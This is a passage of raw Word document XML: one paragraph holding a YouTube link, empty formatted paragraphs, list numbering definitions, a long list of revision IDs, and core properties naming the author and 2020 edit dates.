        <w:t>https://www.youtube.com/watch?v=gjm6VHZa_8s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C6729" w14:textId="77777777" w:rsidR="007A086D" w:rsidRPr="007A086D" w:rsidRDefault="007A086D" w:rsidP="007A086D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477DCE16" w14:textId="77777777" w:rsidR="008A76A5" w:rsidRPr="001F2C49" w:rsidRDefault="008A76A5" w:rsidP="008A76A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496537A1" w14:textId="77777777" w:rsidR="003F0BB3" w:rsidRPr="001F2C49" w:rsidRDefault="003F0BB3" w:rsidP="003F0BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003F0BB3" w:rsidRPr="001F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063C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E90E5C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B0140"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3606E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96B01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9D81844"/>
    <w:lvl w:ilvl="0" w:tplc="9036E506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D"/>
    <w:rsid w:val="00006029"/>
    <w:rsid w:val="00030BAA"/>
    <w:rsid w:val="00041B46"/>
    <w:rsid w:val="00053499"/>
    <w:rsid w:val="000719B0"/>
    <w:rsid w:val="0008135E"/>
    <w:rsid w:val="00092534"/>
    <w:rsid w:val="00094755"/>
    <w:rsid w:val="000B2AC5"/>
    <w:rsid w:val="000C3FA7"/>
    <w:rsid w:val="000D0171"/>
    <w:rsid w:val="000D1BCA"/>
    <w:rsid w:val="000D7AE7"/>
    <w:rsid w:val="000F024E"/>
    <w:rsid w:val="000F5405"/>
    <w:rsid w:val="001225E4"/>
    <w:rsid w:val="00133033"/>
    <w:rsid w:val="00154374"/>
    <w:rsid w:val="0017564F"/>
    <w:rsid w:val="0017580B"/>
    <w:rsid w:val="001D703A"/>
    <w:rsid w:val="001F2C49"/>
    <w:rsid w:val="002057A3"/>
    <w:rsid w:val="002369F7"/>
    <w:rsid w:val="002417D7"/>
    <w:rsid w:val="002700DE"/>
    <w:rsid w:val="002702E0"/>
    <w:rsid w:val="00277155"/>
    <w:rsid w:val="002A097F"/>
    <w:rsid w:val="002B11E3"/>
    <w:rsid w:val="002B67D7"/>
    <w:rsid w:val="002C6C34"/>
    <w:rsid w:val="002D2A5A"/>
    <w:rsid w:val="002D59F9"/>
    <w:rsid w:val="002D5DF7"/>
    <w:rsid w:val="002F0370"/>
    <w:rsid w:val="002F0EB2"/>
    <w:rsid w:val="002F63AB"/>
    <w:rsid w:val="00300C69"/>
    <w:rsid w:val="003025E7"/>
    <w:rsid w:val="003144D4"/>
    <w:rsid w:val="00321BA7"/>
    <w:rsid w:val="00327E37"/>
    <w:rsid w:val="00343B36"/>
    <w:rsid w:val="00344469"/>
    <w:rsid w:val="00364FB5"/>
    <w:rsid w:val="00373FF6"/>
    <w:rsid w:val="00374018"/>
    <w:rsid w:val="0038076D"/>
    <w:rsid w:val="0039278F"/>
    <w:rsid w:val="0039784D"/>
    <w:rsid w:val="003B1FB0"/>
    <w:rsid w:val="003B2672"/>
    <w:rsid w:val="003B736F"/>
    <w:rsid w:val="003D0990"/>
    <w:rsid w:val="003E3EF0"/>
    <w:rsid w:val="003E7A58"/>
    <w:rsid w:val="003F0BB3"/>
    <w:rsid w:val="003F0D41"/>
    <w:rsid w:val="00411BED"/>
    <w:rsid w:val="00416B25"/>
    <w:rsid w:val="00417106"/>
    <w:rsid w:val="00425D18"/>
    <w:rsid w:val="004320AF"/>
    <w:rsid w:val="00435B6A"/>
    <w:rsid w:val="00436B62"/>
    <w:rsid w:val="00451AD4"/>
    <w:rsid w:val="00454CE7"/>
    <w:rsid w:val="004571DF"/>
    <w:rsid w:val="00481CF4"/>
    <w:rsid w:val="00483920"/>
    <w:rsid w:val="0049336C"/>
    <w:rsid w:val="00496304"/>
    <w:rsid w:val="004A2B7F"/>
    <w:rsid w:val="004B0B20"/>
    <w:rsid w:val="004B75B8"/>
    <w:rsid w:val="004E1CFF"/>
    <w:rsid w:val="004E6FCD"/>
    <w:rsid w:val="004F681E"/>
    <w:rsid w:val="00505AA3"/>
    <w:rsid w:val="00516EB0"/>
    <w:rsid w:val="005477C0"/>
    <w:rsid w:val="00561FC9"/>
    <w:rsid w:val="00565EAA"/>
    <w:rsid w:val="00586D60"/>
    <w:rsid w:val="00586E20"/>
    <w:rsid w:val="005925A6"/>
    <w:rsid w:val="005A5F9D"/>
    <w:rsid w:val="005D02DD"/>
    <w:rsid w:val="005D30B9"/>
    <w:rsid w:val="005D66C6"/>
    <w:rsid w:val="005F289B"/>
    <w:rsid w:val="005F52C0"/>
    <w:rsid w:val="0060199A"/>
    <w:rsid w:val="0061113C"/>
    <w:rsid w:val="00613BA0"/>
    <w:rsid w:val="00631EED"/>
    <w:rsid w:val="00652FF7"/>
    <w:rsid w:val="00657A17"/>
    <w:rsid w:val="00666E6A"/>
    <w:rsid w:val="00667A30"/>
    <w:rsid w:val="00672985"/>
    <w:rsid w:val="006829AB"/>
    <w:rsid w:val="00683F3F"/>
    <w:rsid w:val="006C1CE1"/>
    <w:rsid w:val="006C4C0A"/>
    <w:rsid w:val="006D02D5"/>
    <w:rsid w:val="006D6F03"/>
    <w:rsid w:val="006E4F9C"/>
    <w:rsid w:val="006F2E48"/>
    <w:rsid w:val="00702AAE"/>
    <w:rsid w:val="0071030F"/>
    <w:rsid w:val="00722CAE"/>
    <w:rsid w:val="0073262E"/>
    <w:rsid w:val="00734B80"/>
    <w:rsid w:val="00757927"/>
    <w:rsid w:val="00772607"/>
    <w:rsid w:val="00786618"/>
    <w:rsid w:val="007935BC"/>
    <w:rsid w:val="0079432B"/>
    <w:rsid w:val="007A086D"/>
    <w:rsid w:val="007A367C"/>
    <w:rsid w:val="007C232B"/>
    <w:rsid w:val="007C5546"/>
    <w:rsid w:val="007C6E7D"/>
    <w:rsid w:val="007E2334"/>
    <w:rsid w:val="007E774A"/>
    <w:rsid w:val="007F489B"/>
    <w:rsid w:val="007F494F"/>
    <w:rsid w:val="007F7518"/>
    <w:rsid w:val="00813730"/>
    <w:rsid w:val="00822231"/>
    <w:rsid w:val="00832582"/>
    <w:rsid w:val="008350A5"/>
    <w:rsid w:val="00847942"/>
    <w:rsid w:val="00865E27"/>
    <w:rsid w:val="00887E58"/>
    <w:rsid w:val="008921FA"/>
    <w:rsid w:val="008962FE"/>
    <w:rsid w:val="008A76A5"/>
    <w:rsid w:val="008B4D8A"/>
    <w:rsid w:val="008B6154"/>
    <w:rsid w:val="008B7060"/>
    <w:rsid w:val="008C7563"/>
    <w:rsid w:val="008D650E"/>
    <w:rsid w:val="008D75FB"/>
    <w:rsid w:val="008E207E"/>
    <w:rsid w:val="008E5D89"/>
    <w:rsid w:val="008F3577"/>
    <w:rsid w:val="00912F1B"/>
    <w:rsid w:val="00933C01"/>
    <w:rsid w:val="009435D3"/>
    <w:rsid w:val="0094700C"/>
    <w:rsid w:val="00947155"/>
    <w:rsid w:val="009639CC"/>
    <w:rsid w:val="00963F55"/>
    <w:rsid w:val="009655D6"/>
    <w:rsid w:val="00965852"/>
    <w:rsid w:val="009844D7"/>
    <w:rsid w:val="009933DE"/>
    <w:rsid w:val="009946FB"/>
    <w:rsid w:val="009A1979"/>
    <w:rsid w:val="009A338A"/>
    <w:rsid w:val="009A481D"/>
    <w:rsid w:val="009A551C"/>
    <w:rsid w:val="009B061A"/>
    <w:rsid w:val="009F0698"/>
    <w:rsid w:val="009F12CB"/>
    <w:rsid w:val="009F26AD"/>
    <w:rsid w:val="00A06A95"/>
    <w:rsid w:val="00A25E86"/>
    <w:rsid w:val="00A42DD1"/>
    <w:rsid w:val="00A43562"/>
    <w:rsid w:val="00A43FC6"/>
    <w:rsid w:val="00A706E7"/>
    <w:rsid w:val="00A72A68"/>
    <w:rsid w:val="00A865C0"/>
    <w:rsid w:val="00AB3F9D"/>
    <w:rsid w:val="00AB4E5C"/>
    <w:rsid w:val="00AF12E9"/>
    <w:rsid w:val="00AF4734"/>
    <w:rsid w:val="00B07A07"/>
    <w:rsid w:val="00B2117F"/>
    <w:rsid w:val="00B33108"/>
    <w:rsid w:val="00B45E92"/>
    <w:rsid w:val="00B51E05"/>
    <w:rsid w:val="00B60912"/>
    <w:rsid w:val="00B61FCD"/>
    <w:rsid w:val="00B74FFD"/>
    <w:rsid w:val="00B85CC4"/>
    <w:rsid w:val="00B932C2"/>
    <w:rsid w:val="00BA14FE"/>
    <w:rsid w:val="00BA3C5B"/>
    <w:rsid w:val="00BB72A5"/>
    <w:rsid w:val="00BC296B"/>
    <w:rsid w:val="00BE083B"/>
    <w:rsid w:val="00BF04EC"/>
    <w:rsid w:val="00BF18C8"/>
    <w:rsid w:val="00C000CE"/>
    <w:rsid w:val="00C04D4F"/>
    <w:rsid w:val="00C30D0A"/>
    <w:rsid w:val="00C80FC3"/>
    <w:rsid w:val="00C8645E"/>
    <w:rsid w:val="00C87318"/>
    <w:rsid w:val="00C90A14"/>
    <w:rsid w:val="00C971D2"/>
    <w:rsid w:val="00CA4EDB"/>
    <w:rsid w:val="00CF68AC"/>
    <w:rsid w:val="00CF7F47"/>
    <w:rsid w:val="00D0742B"/>
    <w:rsid w:val="00D44717"/>
    <w:rsid w:val="00D53791"/>
    <w:rsid w:val="00D56F0F"/>
    <w:rsid w:val="00D61FA1"/>
    <w:rsid w:val="00D67B10"/>
    <w:rsid w:val="00D70A55"/>
    <w:rsid w:val="00D73AF7"/>
    <w:rsid w:val="00D87E40"/>
    <w:rsid w:val="00DB30E3"/>
    <w:rsid w:val="00DC791F"/>
    <w:rsid w:val="00DD273D"/>
    <w:rsid w:val="00DD6AFB"/>
    <w:rsid w:val="00E07587"/>
    <w:rsid w:val="00E108A7"/>
    <w:rsid w:val="00E11EAD"/>
    <w:rsid w:val="00E169EE"/>
    <w:rsid w:val="00E25DA7"/>
    <w:rsid w:val="00E31309"/>
    <w:rsid w:val="00E711A1"/>
    <w:rsid w:val="00E71D33"/>
    <w:rsid w:val="00E7756A"/>
    <w:rsid w:val="00E86EFA"/>
    <w:rsid w:val="00EA48FD"/>
    <w:rsid w:val="00EB2C6D"/>
    <w:rsid w:val="00EB7BA4"/>
    <w:rsid w:val="00ED5510"/>
    <w:rsid w:val="00EE05E4"/>
    <w:rsid w:val="00EE1EBD"/>
    <w:rsid w:val="00EF5222"/>
    <w:rsid w:val="00F05415"/>
    <w:rsid w:val="00F42403"/>
    <w:rsid w:val="00F46A5E"/>
    <w:rsid w:val="00F80BF0"/>
    <w:rsid w:val="00F91113"/>
    <w:rsid w:val="00F93E65"/>
    <w:rsid w:val="00FA56CB"/>
    <w:rsid w:val="00FB35C5"/>
    <w:rsid w:val="00FB7FCC"/>
    <w:rsid w:val="00FC17FC"/>
    <w:rsid w:val="00FC2045"/>
    <w:rsid w:val="00FE2088"/>
    <w:rsid w:val="00FE644B"/>
    <w:rsid w:val="00FF5E91"/>
    <w:rsid w:val="00F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C35B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C85D35F7-289F-47AD-B7C3-2388AB0B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3F0BB3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007A08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51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F0D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8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DANNY</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ARDIAN DANNY</cp:lastModifiedBy>
  <cp:revision>305</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-06T05:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-24T08:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>